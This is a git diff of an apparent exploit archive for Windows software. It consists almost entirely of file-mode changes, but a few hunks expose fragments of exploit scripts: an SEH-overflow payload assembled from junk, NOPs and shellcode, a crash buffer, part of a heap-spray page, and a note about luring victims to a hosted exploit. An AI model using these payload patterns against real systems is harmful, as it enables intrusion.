b/platforms/windows/local/43134.c old mode 100755 new mode 100644 index 6f2f0dcf6..1a2f88a46 --- a/platforms/windows/local/43134.c +++ b/platforms/windows/local/43134.c @@ -139,4 +139,4 @@ is given to the author. The author is not responsible for any misuse of the info for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). -hyp3rlinx +hyp3rlinx \ No newline at end of file diff --git a/platforms/windows/local/43139.c b/platforms/windows/local/43139.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4314.php b/platforms/windows/local/4314.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4325.php b/platforms/windows/local/4325.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4345.c b/platforms/windows/local/4345.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4355.php b/platforms/windows/local/4355.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4364.php b/platforms/windows/local/4364.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4517.php b/platforms/windows/local/4517.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4553.php b/platforms/windows/local/4553.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4584.c b/platforms/windows/local/4584.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4625.txt b/platforms/windows/local/4625.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4749.c b/platforms/windows/local/4749.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/4998.c b/platforms/windows/local/4998.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5004.c b/platforms/windows/local/5004.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5032.c b/platforms/windows/local/5032.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5077.cpp b/platforms/windows/local/5077.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5107.c b/platforms/windows/local/5107.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5141.c b/platforms/windows/local/5141.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5143.c b/platforms/windows/local/5143.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5144.c b/platforms/windows/local/5144.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/52.asm b/platforms/windows/local/52.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5250.cpp b/platforms/windows/local/5250.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5287.txt b/platforms/windows/local/5287.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5320.txt b/platforms/windows/local/5320.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5442.cpp b/platforms/windows/local/5442.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5479.txt b/platforms/windows/local/5479.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5492.cpp b/platforms/windows/local/5492.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5518.txt b/platforms/windows/local/5518.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/558.c b/platforms/windows/local/558.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5584.c b/platforms/windows/local/5584.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/559.c b/platforms/windows/local/559.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/560.txt b/platforms/windows/local/560.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5625.c b/platforms/windows/local/5625.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5837.c b/platforms/windows/local/5837.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/5951.c b/platforms/windows/local/5951.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/6031.asm b/platforms/windows/local/6031.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/6039.c b/platforms/windows/local/6039.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/6188.c b/platforms/windows/local/6188.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/6389.cpp b/platforms/windows/local/6389.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/6705.txt b/platforms/windows/local/6705.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/6757.txt b/platforms/windows/local/6757.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/6831.cpp b/platforms/windows/local/6831.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/694.c b/platforms/windows/local/694.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/6994.txt b/platforms/windows/local/6994.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7006.txt b/platforms/windows/local/7006.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7054.txt b/platforms/windows/local/7054.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7135.htm b/platforms/windows/local/7135.htm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7264.txt b/platforms/windows/local/7264.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/749.cpp b/platforms/windows/local/749.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7501.asp b/platforms/windows/local/7501.asp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7516.txt b/platforms/windows/local/7516.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7533.txt b/platforms/windows/local/7533.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7536.cpp b/platforms/windows/local/7536.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/760.cpp b/platforms/windows/local/760.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/769.c b/platforms/windows/local/769.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7702.c b/platforms/windows/local/7702.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7843.c b/platforms/windows/local/7843.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/79.c b/platforms/windows/local/79.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7923.c b/platforms/windows/local/7923.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7929.c b/platforms/windows/local/7929.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7974.c b/platforms/windows/local/7974.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/798.c b/platforms/windows/local/798.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/7994.c b/platforms/windows/local/7994.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/803.c b/platforms/windows/local/803.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/811.c b/platforms/windows/local/811.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8138.c b/platforms/windows/local/8138.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8175.txt b/platforms/windows/local/8175.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8189.txt b/platforms/windows/local/8189.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8214.c b/platforms/windows/local/8214.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8231.php b/platforms/windows/local/8231.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8249.php b/platforms/windows/local/8249.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8250.txt b/platforms/windows/local/8250.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8280.txt b/platforms/windows/local/8280.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8322.txt b/platforms/windows/local/8322.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/833.cpp b/platforms/windows/local/833.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/834.c b/platforms/windows/local/834.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/835.c b/platforms/windows/local/835.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/836.c b/platforms/windows/local/836.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/837.c b/platforms/windows/local/837.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/839.cpp b/platforms/windows/local/839.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8401.cpp b/platforms/windows/local/8401.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8411.c b/platforms/windows/local/8411.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/844.asm b/platforms/windows/local/844.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8444.cpp b/platforms/windows/local/8444.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/846.cpp b/platforms/windows/local/846.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/848.asm b/platforms/windows/local/848.asm old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8540.c b/platforms/windows/local/8540.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8541.php b/platforms/windows/local/8541.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8595.txt b/platforms/windows/local/8595.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/863.cpp b/platforms/windows/local/863.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8657.txt b/platforms/windows/local/8657.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8670.php b/platforms/windows/local/8670.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8780.php b/platforms/windows/local/8780.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8782.txt b/platforms/windows/local/8782.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8783.c b/platforms/windows/local/8783.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/884.cpp b/platforms/windows/local/884.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/885.cpp b/platforms/windows/local/885.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8863.c b/platforms/windows/local/8863.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8875.txt b/platforms/windows/local/8875.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8881.php b/platforms/windows/local/8881.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/8983.c b/platforms/windows/local/8983.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/905.c b/platforms/windows/local/905.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/912.c b/platforms/windows/local/912.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9142.c b/platforms/windows/local/9142.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/918.c b/platforms/windows/local/918.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/919.c b/platforms/windows/local/919.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9199.txt b/platforms/windows/local/9199.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/920.c b/platforms/windows/local/920.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9223.txt b/platforms/windows/local/9223.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/927.c b/platforms/windows/local/927.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9301.txt b/platforms/windows/local/9301.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9305.txt b/platforms/windows/local/9305.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/932.sql b/platforms/windows/local/932.sql old mode 100755 new mode 100644 diff --git a/platforms/windows/local/933.sql b/platforms/windows/local/933.sql old mode 100755 new mode 100644 diff --git a/platforms/windows/local/935.c b/platforms/windows/local/935.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/936.c b/platforms/windows/local/936.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/937.c b/platforms/windows/local/937.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/938.cpp b/platforms/windows/local/938.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9386.txt b/platforms/windows/local/9386.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9426.java b/platforms/windows/local/9426.java old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9492.c b/platforms/windows/local/9492.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9550.txt b/platforms/windows/local/9550.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9560.txt b/platforms/windows/local/9560.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9579.txt b/platforms/windows/local/9579.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9618.php b/platforms/windows/local/9618.php old mode 100755 new mode 100644 diff --git a/platforms/windows/local/963.c b/platforms/windows/local/963.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/964.c b/platforms/windows/local/964.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/965.c b/platforms/windows/local/965.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9659.cpp b/platforms/windows/local/9659.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/966.c b/platforms/windows/local/966.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9661.c b/platforms/windows/local/9661.c old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9680.txt b/platforms/windows/local/9680.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/971.cpp b/platforms/windows/local/971.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9807.txt b/platforms/windows/local/9807.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9831.txt b/platforms/windows/local/9831.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9866.txt b/platforms/windows/local/9866.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9882.txt b/platforms/windows/local/9882.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9884.txt b/platforms/windows/local/9884.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9894.txt b/platforms/windows/local/9894.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9895.txt b/platforms/windows/local/9895.txt old mode 100755 new mode 100644 index 25e565c0f..243704022 --- a/platforms/windows/local/9895.txt +++ b/platforms/windows/local/9895.txt @@ -60,6 +60,4 @@ my $junk2 ="\x90" x 100; my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2; open (myfile,">$sploitfile"); print myfile $payload; -close (myfile); - - \ No newline at end of file +close (myfile); \ No newline at end of file diff --git a/platforms/windows/local/9970.txt b/platforms/windows/local/9970.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9983.pl b/platforms/windows/local/9983.pl index 843723d6f..b4ab973da 100755 --- a/platforms/windows/local/9983.pl +++ b/platforms/windows/local/9983.pl @@ -10,4 +10,4 @@ my $crash = "\x41" x 5000; open(myfile,'>>DragonR.m3u'); -print myfile $crash; \ No newline at end of file +print myfile $crash; \ No newline at end of file diff --git a/platforms/windows/local/9988.txt b/platforms/windows/local/9988.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/local/9991.txt b/platforms/windows/local/9991.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1.c b/platforms/windows/remote/1.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/100.c b/platforms/windows/remote/100.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/10007.html b/platforms/windows/remote/10007.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/10047.txt b/platforms/windows/remote/10047.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/10053.txt b/platforms/windows/remote/10053.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/10054.txt b/platforms/windows/remote/10054.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/10070.php b/platforms/windows/remote/10070.php old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/10079.txt b/platforms/windows/remote/10079.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1026.cpp b/platforms/windows/remote/1026.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/10269.html b/platforms/windows/remote/10269.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1028.c b/platforms/windows/remote/1028.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/103.c b/platforms/windows/remote/103.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1035.c b/platforms/windows/remote/1035.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/10375.html b/platforms/windows/remote/10375.html old mode 100755 new mode 100644 index b58f7e4e2..d61e13543 --- a/platforms/windows/remote/10375.html +++ b/platforms/windows/remote/10375.html @@ -89,4 +89,4 @@ for (i = 0; i < 40000; i++) { buffer = buffer + unescape("%0D") } target.Accept buffer spary(); </script> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/10542.py b/platforms/windows/remote/10542.py index 9b1802816..d223ee1ae 100755 --- a/platforms/windows/remote/10542.py +++ b/platforms/windows/remote/10542.py @@ -66,5 +66,4 @@ try: print "[-] send() error !" print "[+] Done " except: - print "[x] Socket() error!" - \ No newline at end of file + print "[x] Socket() error!" \ No newline at end of file diff --git a/platforms/windows/remote/1066.cpp b/platforms/windows/remote/1066.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1075.c b/platforms/windows/remote/1075.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1079.html b/platforms/windows/remote/1079.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1089.c b/platforms/windows/remote/1089.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/109.c b/platforms/windows/remote/109.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1096.txt b/platforms/windows/remote/1096.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1102.html b/platforms/windows/remote/1102.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11059.html b/platforms/windows/remote/11059.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11138.c b/platforms/windows/remote/11138.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11151.html b/platforms/windows/remote/11151.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11172.html b/platforms/windows/remote/11172.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11173.txt b/platforms/windows/remote/11173.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1118.c b/platforms/windows/remote/1118.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/112.c b/platforms/windows/remote/112.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11204.html b/platforms/windows/remote/11204.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1130.c b/platforms/windows/remote/1130.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1131.c b/platforms/windows/remote/1131.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1132.c b/platforms/windows/remote/1132.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1144.html b/platforms/windows/remote/1144.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11457.pl b/platforms/windows/remote/11457.pl index e01bb132a..a0925f406 100755 --- a/platforms/windows/remote/11457.pl +++ b/platforms/windows/remote/11457.pl @@ -213,4 +213,4 @@ while (my $client = $server->accept()) { # ============================================================================ # The "test" user has been created successfully # -# Delete The "Public_Html\index.html" If you use this for the 2nd time \ No newline at end of file +# Delete The "Public_Html\index.html" If you use this for the 2nd time \ No newline at end of file diff --git a/platforms/windows/remote/1146.c b/platforms/windows/remote/1146.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1147.pm b/platforms/windows/remote/1147.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1149.c b/platforms/windows/remote/1149.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1150.pm b/platforms/windows/remote/1150.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1151.pm b/platforms/windows/remote/1151.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1152.pm b/platforms/windows/remote/1152.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/116.c b/platforms/windows/remote/116.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11650.c b/platforms/windows/remote/11650.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11661.txt b/platforms/windows/remote/11661.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11694.txt b/platforms/windows/remote/11694.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/117.c b/platforms/windows/remote/117.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11750.html b/platforms/windows/remote/11750.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11765.txt b/platforms/windows/remote/11765.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1178.c b/platforms/windows/remote/1178.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1179.c b/platforms/windows/remote/1179.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1180.c b/platforms/windows/remote/1180.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1183.c b/platforms/windows/remote/1183.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1184.c b/platforms/windows/remote/1184.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11857.c b/platforms/windows/remote/11857.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11879.txt b/platforms/windows/remote/11879.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/119.c b/platforms/windows/remote/119.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1190.c b/platforms/windows/remote/1190.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/11973.txt b/platforms/windows/remote/11973.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12044.c b/platforms/windows/remote/12044.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/121.c b/platforms/windows/remote/121.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1210.pm b/platforms/windows/remote/1210.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12117.txt b/platforms/windows/remote/12117.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12156.txt b/platforms/windows/remote/12156.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12202.html b/platforms/windows/remote/12202.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12203.html b/platforms/windows/remote/12203.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1223.c b/platforms/windows/remote/1223.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1224.html b/platforms/windows/remote/1224.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12244.txt b/platforms/windows/remote/12244.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12247.html b/platforms/windows/remote/12247.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12248.html b/platforms/windows/remote/12248.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12250.html b/platforms/windows/remote/12250.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/123.c b/platforms/windows/remote/123.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12308.txt b/platforms/windows/remote/12308.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12309.txt b/platforms/windows/remote/12309.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12310.txt b/platforms/windows/remote/12310.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12320.txt b/platforms/windows/remote/12320.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12331.txt b/platforms/windows/remote/12331.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12367.html b/platforms/windows/remote/12367.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1243.c b/platforms/windows/remote/1243.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12480.txt b/platforms/windows/remote/12480.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12498.txt b/platforms/windows/remote/12498.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12511.txt b/platforms/windows/remote/12511.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12573.html b/platforms/windows/remote/12573.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12580.txt b/platforms/windows/remote/12580.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12581.txt b/platforms/windows/remote/12581.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12582.txt b/platforms/windows/remote/12582.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1260.pm b/platforms/windows/remote/1260.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12614.txt b/platforms/windows/remote/12614.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1262.pm b/platforms/windows/remote/1262.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12657.txt b/platforms/windows/remote/12657.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12663.html b/platforms/windows/remote/12663.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12673.txt b/platforms/windows/remote/12673.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1277.c b/platforms/windows/remote/1277.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1279.pm b/platforms/windows/remote/1279.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/12815.txt b/platforms/windows/remote/12815.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/130.c b/platforms/windows/remote/130.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1313.c b/platforms/windows/remote/1313.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1330.c b/platforms/windows/remote/1330.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1332.pm b/platforms/windows/remote/1332.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/135.c b/platforms/windows/remote/135.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1352.cpp b/platforms/windows/remote/1352.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1357.diff b/platforms/windows/remote/1357.diff old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1365.pm b/platforms/windows/remote/1365.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1366.pm b/platforms/windows/remote/1366.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/13808.txt b/platforms/windows/remote/13808.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1381.pm b/platforms/windows/remote/1381.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/13818.txt b/platforms/windows/remote/13818.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/13822.txt b/platforms/windows/remote/13822.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/13834.html b/platforms/windows/remote/13834.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1391.pm b/platforms/windows/remote/1391.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14013.txt b/platforms/windows/remote/14013.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1413.c b/platforms/windows/remote/1413.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14179.txt b/platforms/windows/remote/14179.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14180.py b/platforms/windows/remote/14180.py index 58c2a0e39..adc4793ae 100755 --- a/platforms/windows/remote/14180.py +++ b/platforms/windows/remote/14180.py @@ -78,4 +78,4 @@ data = r.read() print data c.close() -print "\nDone\n" \ No newline at end of file +print "\nDone\n" \ No newline at end of file diff --git a/platforms/windows/remote/14181.py b/platforms/windows/remote/14181.py index 7ea902c01..9d821d091 100755 --- a/platforms/windows/remote/14181.py +++ b/platforms/windows/remote/14181.py @@ -74,4 +74,4 @@ data = r.read() print data c.close() -print "\nDone\n" \ No newline at end of file +print "\nDone\n" \ No newline at end of file diff --git a/platforms/windows/remote/14182.py b/platforms/windows/remote/14182.py index f56d8374c..ddec51f51 100755 --- a/platforms/windows/remote/14182.py +++ b/platforms/windows/remote/14182.py @@ -86,4 +86,4 @@ data = r.read() print data c.close() -print "\nDone\n" \ No newline at end of file +print "\nDone\n" \ No newline at end of file diff --git a/platforms/windows/remote/14194.cpp b/platforms/windows/remote/14194.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14195.html b/platforms/windows/remote/14195.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1420.c b/platforms/windows/remote/1420.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14200.html b/platforms/windows/remote/14200.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/1421.cpp b/platforms/windows/remote/1421.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14257.py b/platforms/windows/remote/14257.py index 942a0b0e6..85d618f90 100755 --- a/platforms/windows/remote/14257.py +++ b/platforms/windows/remote/14257.py @@ -46,4 +46,4 @@ print FILE $code.$junk.$more.$nops.$shell; close(FILE); print "[*] Use Backtrack! place httpd.conf in /etc/apache2/ and start apache.\n"; -print "[*] Have Someone Connect to your Server /sploit.\n"; \ No newline at end of file +print "[*] Have Someone Connect to your Server /sploit.\n"; \ No newline at end of file diff --git a/platforms/windows/remote/14267.txt b/platforms/windows/remote/14267.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14269.html b/platforms/windows/remote/14269.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14275.txt b/platforms/windows/remote/14275.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14287.cpp b/platforms/windows/remote/14287.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14309.html b/platforms/windows/remote/14309.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14321.html b/platforms/windows/remote/14321.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/14385.html b/platforms/windows/remote/14385.html old mode 100755 new mode 100644 index 5020adbb0..8978936c6 --- 